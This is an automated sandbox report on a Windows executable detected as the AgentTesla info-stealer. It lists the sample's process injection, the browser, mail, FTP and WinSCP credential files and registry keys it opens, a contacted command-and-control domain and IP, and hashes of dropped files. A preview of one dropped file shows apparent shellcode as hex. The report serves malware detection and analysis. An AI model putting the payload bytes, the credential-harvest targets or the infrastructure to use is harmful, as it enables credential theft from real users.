Code function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00E74A35

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00ED4EF5 mouse_event,

0_2_00ED4EF5

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"

Jump to behavior

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

0_2_00EC81F7

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00ED4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00ED4C03

Source: 7F7R8soxHM.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 7F7R8soxHM.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E9886B cpuid

0_2_00E9886B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EA50D7

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EB2230 GetUserNameW,

0_2_00EB2230

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00EA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00EA418A

Source: C:\Users\user\Desktop\7F7R8soxHM.exe

Code function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00E74AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: 7F7R8soxHM.exe	Binary or memory string: WIN_81
Source: 7F7R8soxHM.exe	Binary or memory string: WIN_XP
Source: 7F7R8soxHM.exe	Binary or memory string: WIN_XPe
Source: 7F7R8soxHM.exe	Binary or memory string: WIN_VISTA
Source: 7F7R8soxHM.exe	Binary or memory string: WIN_7
Source: 7F7R8soxHM.exe	Binary or memory string: WIN_8
Source: 7F7R8soxHM.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR

Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EE6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00EE6596
Source: C:\Users\user\Desktop\7F7R8soxHM.exe	Code function: 0_2_00EE6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00EE6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	38 System Information Discovery	Distributed Component Object Model	121 Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	11 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Virtualization/Sandbox Evasion	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Access Token Manipulation	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
7F7R8soxHM.exe	66%	ReversingLabs	Win32.Trojan.AutoitInject
7F7R8soxHM.exe	64%	Virustotal		Browse
7F7R8soxHM.exe	100%	Avira	TR/AD.ShellcodeCrypter.snnre
7F7R8soxHM.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
ftp.transotraval.cl	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://account.dyn.com/	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://ftp.transotraval.cl	0%	Avira URL Cloud	safe
http://ftp.transotraval.cl	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftp.transotraval.cl	201.148.105.186	true	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://account.dyn.com/	7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ftp.transotraval.cl	RegSvcs.exe, 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2883490395.000000000296C000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
201.148.105.186	ftp.transotraval.cl	Chile		265839	HOSTINGCL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447089
Start date and time:	2024-05-24 11:17:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7F7R8soxHM.exe renamed because original name is a hash value
Original Sample Name:	8f537e91245bcc1510a9867cb88b12ea.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 56 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTINGCL	https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=https://agrisil.cl/pbxv/ryt/xxx%23c3VueWEuY2hhbkB5b2dpcHJvZHVjdHMuY29t	Get hash	malicious	HTMLPhisher	Browse	201.148.105.56
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	201.148.107.87
	https://medilabr.com/w4nmwhg/	Get hash	malicious	Unknown	Browse	201.148.107.213
	https://broussardsecurity.com/pns/omx/2hm7xsyjqu7	Get hash	malicious	Phisher	Browse	201.148.107.213
	https://cortivaschools.com/fmg/dt/2ljp5bw2hga	Get hash	malicious	Phisher	Browse	201.148.107.213
	https://indigocean.com/x0q/c31/bddgdxodv0u	Get hash	malicious	Phisher	Browse	201.148.107.213
	OriginalMessage.txt.msg	Get hash	malicious	Unknown	Browse	201.148.107.213
	https://broussardsecurity.com/asv/sv/83ze8tdfvjp	Get hash	malicious	Phisher	Browse	201.148.107.213
	_EXTERNAL_ ESA Quarantine - Phish using vendor compromised emails.msg	Get hash	malicious	Unknown	Browse	201.148.107.213
	_EXTERNAL_ ESA Quarantine - email fails SPF checks.msg	Get hash	malicious	Phisher	Browse	201.148.107.213

Process:	C:\Users\user\Desktop\7F7R8soxHM.exe
File Type:	data
Category:	dropped
Size (bytes):	157422
Entropy (8bit):	7.946097560930617
Encrypted:	false
SSDEEP:	3072:HC1FAPrivNNFs0gFyb4sW21DJu7wDdy7XnNIs2aKYgQgPCBi:c+ryNN7csW2dJu7wZy73NIs2aKYgQPU
MD5:	3D095701F0362BB48E2B18F2919A87A7
SHA1:	F64D3C86CA252154421171118A80CBE5C06E2645
SHA-256:	BF7383B2005EAE76087BEB839D84F86B65C17C4F69851C67FB30CA3C70DEE806
SHA-512:	6F6230AE450040A9B5C33E66E18EC2FB37C11FE079C59DD25BDF3A84124222366490CF541E5543474AA695FE75F12F0765E787D362A2A575081D7FE79966158F
Malicious:	false
Reputation:	low
Preview:	EA06.......SZ.F.K.N)3mn.q3.Tf..Q.Q.3)...d....,.gJ...0.g....m,.W.........;..q9..)Rj..IU..f...f.j..l.:=n.8.Z.x.Z..U.....$...,..J..gt.$..^.d..D.Nf...+.S.Rg.....&.U....M..H]Bqi.}'S:UT.[4 .mF).j.....I.+.L.TfSZ...(..@....dwe...#@./N.Q...8~ ..oJ..}\|.".`..".Ud.g...J.p.2.P..@.Kg.kR....L..m2..%.7,.d..)uP.".C..4uU...2~......kC..'3Z...R....i..S..3.`.o.#7...+.;..v.e_..Ju..2..t...sI..'..d......f.<...3r.O!...[/m.W..]..W..J;7i......{...........R...N[Y..rv.....Y..=.....T.2..F.E......u....RK...T...?~.z........-....;m.&.9.F........d..l.c^.[`R.l. ..7.......>...^.M.B.....$.D.z=.r.+.Y<<...~..M@2.P.A$.."..%t....p....\..E.8HP.....- .E`..}....a7.N6.^.E....._V......f...~`..\|.;#.x7..w.7...=.o.&.]n<......_..H...s.Df5:..mH.L.S.}.5...bsz=V.I..)S.}.....b....h.gzt<..o...h.....f......o..N.+.P....e+.7.M.\..2'/....KT......2..._q..lV+T.})...b.:.L....c'.F.5.e2..Ej4.~.[Y.R(.ZUFgG.L.U[%..2.O...dK.4.D..:...9.M......8..u..%BqO..h....`..F*.9..2..nt.D..I.U..(..7.....df..Uu...j!).T

C:\Users\user\AppData\Local\Temp\aut5E3B.tmp

Download File

Process:	C:\Users\user\Desktop\7F7R8soxHM.exe
File Type:	data
Category:	dropped
Size (bytes):	9964
Entropy (8bit):	7.601948232089083
Encrypted:	false
SSDEEP:	192:eyaFcTokLqcFEelaNVvfNa5u0WK30vtTW3Qg/kWTdd2GV2bKnAalGh:AFxkLqcCela/KTWK30vFaQQzTD2GV2aK
MD5:	8557600CD13C99EC20921F8EC4BF5E47
SHA1:	0E27680328D89CD63C40E2CAFE42B9E88A064E12
SHA-256:	E3E26D945A381A34A13D1F288C4D71816648A14761E9270E0D5C53DB5AE73791
SHA-512:	0DD1364A1F2A676EFD27172A09383CF17C122D4E0E151FEFCDFC95B89BFBB08ADDF4C97D535815CB0C779A32DA1A796DA25B1F3D3DBF955E4B4445F3DDDCE0BC
Malicious:	false
Reputation:	low
Preview:	EA06..t4.M(...aD..fT)..D.Mh.z,.gA....5.......B.Mh..%.mF.Mf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...\|.I..W.d...\|vI..W.d...\|vK..W.d...\|vK(.W.e...\|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn.

C:\Users\user\AppData\Local\Temp\scroll

Download File

Process:	C:\Users\user\Desktop\7F7R8soxHM.exe
File Type:	ASCII text, with very long lines (29748), with no line terminators
Category:	dropped
Size (bytes):	29748
Entropy (8bit):	3.5551070761940133
Encrypted:	false
SSDEEP:	768:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I563b4vfF3if6gys:ViTZ+2QoioGRk6ZklputwjpjBkCiw2Rc
MD5:	1BA4B453896EFF62C6A724C7F4527561
SHA1:	AD6C315D54253B2273D5662347BA22F876C7A38C
SHA-256:	57FD9A461238315EC6DFCD493862BF0D00A736A6F2CD8817FC2264826574334B
SHA-512:	34080CE06B4F634F11EAF7C193DDC4CBD2EAA518547508FD98F8DBB32FF091377FE1418C1F8FF1F6145FE23D822C583FB51A51966AC7C09284D38C818975DECA
Malicious:	false
Reputation:	low
Preview:	84F98E0D192B10FD05E7E43AEF7957D5930866ABD5D0DA6FF50x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000

C:\Users\user\AppData\Local\Temp\undiscernibly

Download File

Process:	C:\Users\user\Desktop\7F7R8soxHM.exe
File Type:	data
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.686907580712448
Encrypted:	false
SSDEEP:	6144:ffus12Rlhf4nQLcJQNwh3qxtPyavQvz6amVb/nlmoxFp:WRHAucu+jEb/nlz
MD5:	6B7E59289EE369D7C66EA9D090AE2256
SHA1:	FE64E804F26AB0C266A1069E3BE8389C014CA8BB
SHA-256:	0301FF6AB761ECC755B047D7A5FC1C7DC0619CB794191378448CAB53933744EF
SHA-512:	6BD0ED5F9EB8F508E1AAA39185849BDE8C59D5DC8DBA9FFB293C7EF2CD6CECB925CA13865206F128E7A2E5951403D71A14906DECDE67ABFC85C8D36E1B75C2D2
Malicious:	false
Reputation:	low
Preview:	...5@QJKT8I6..83.Q7962JQ.FA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8.6RE6,._7.?.k.M...a+89k J&Q $U.)0YWYFj3)f3G[c8$k.w..?\Vd\:3.2JQLFA2e.QJ.Q;I...^3JQ7962J.LD@94HQJ.S8I>RE83JQy.52JqLFA.6CQJ.P8i6RE:3JU7962JQLBA25CQJKP.M6RG83JQ7942..LFQ25SQJKP(I6BE83JQ7)62JQLFA25CQ..S8.6RE8.IQq<62JQLFA25CQJKP8I6RE87J]7962JQLFA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8I6RE83JQ79.2JYLFA25CQJKP8A.REp3JQ7962JQLFoFP;%JKPl.5RE.3JQ.:62HQLFA25CQJKP8I6rE8Sd#DKU2JQ.CA25.RJKV8I6.F83JQ7962JQLFAr5C.d95T&URE43JQ7922JSLFA.6CQJKP8I6RE83J.79t2JQLFA25CQJKP8I6b.;3JQ79~2JQNFD2..SJ#a9I5RE82JQ1962JQLFA25CQJKP8I6RE83JQ7962JQLFA25CQJKP8I6RE83JL......r.<.?!V.m._.5..+..(.v9s_.7R..~.\....'C.zJ.8....X...@.YO2Q......SA 9QeEe^-.\....wj$x..T+.I..G..$Wh.h...wi....9&.`..%.U]'.-61^Pm.+-1J .P.93JQ7.......[M..gH_&}$......+Nd....?25C5JKPJI6R$83J.796]JQL(A25=QJK.8I6.E83.Q79.2JQiFA2XCQJoP8IHRE8.7^8...#".A25CQ.....[..l.f....;.2.#.......3..7[.&tuq._.*~.T.!Msv.1SC<6HV3::.D.....7GUOIW<J:oKs.......h..C....1.DI6RE83.Q7.62J..F.25C.J.P..6RE..J.7.6...L

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.9460982616861395
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7F7R8soxHM.exe
File size:	1'043'968 bytes
MD5:	8f537e91245bcc1510a9867cb88b12ea
SHA1:	dfc1fac222ea213d44aa9b5de65c83ffbd80ba0c
SHA256:	7615090de90b379091f499d125db3c25943f3992e9ed09dab3d2a701d11b2b01
SHA512:	39d687d2f2264136543d92f0ae8aa614fdb34fb8d26684b90bb5a27bd2da4baae1f690dae598109c94a6ac2397af2b61c60bcf05467d1df8611117a33dc1f524
SSDEEP:	24576:DAHnh+eWsN3skA4RV1Hom2KXMmHasZTWI89PH3g3m32h5:Oh+ZkldoPK8Yasv8NH3d3M
TLSH:	B225AC0273D1C032FFAB92739B6AF64556BC79254133852F13982DB9BD701B2227E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x664B3010 [Mon May 20 11:12:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F67652D209Dh
jmp 00007F67652C4E54h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F67652C4FDAh
cmp edi, eax
jc 00007F67652C533Eh
bt dword ptr [004C41FCh], 01h
jnc 00007F67652C4FD9h
rep movsb
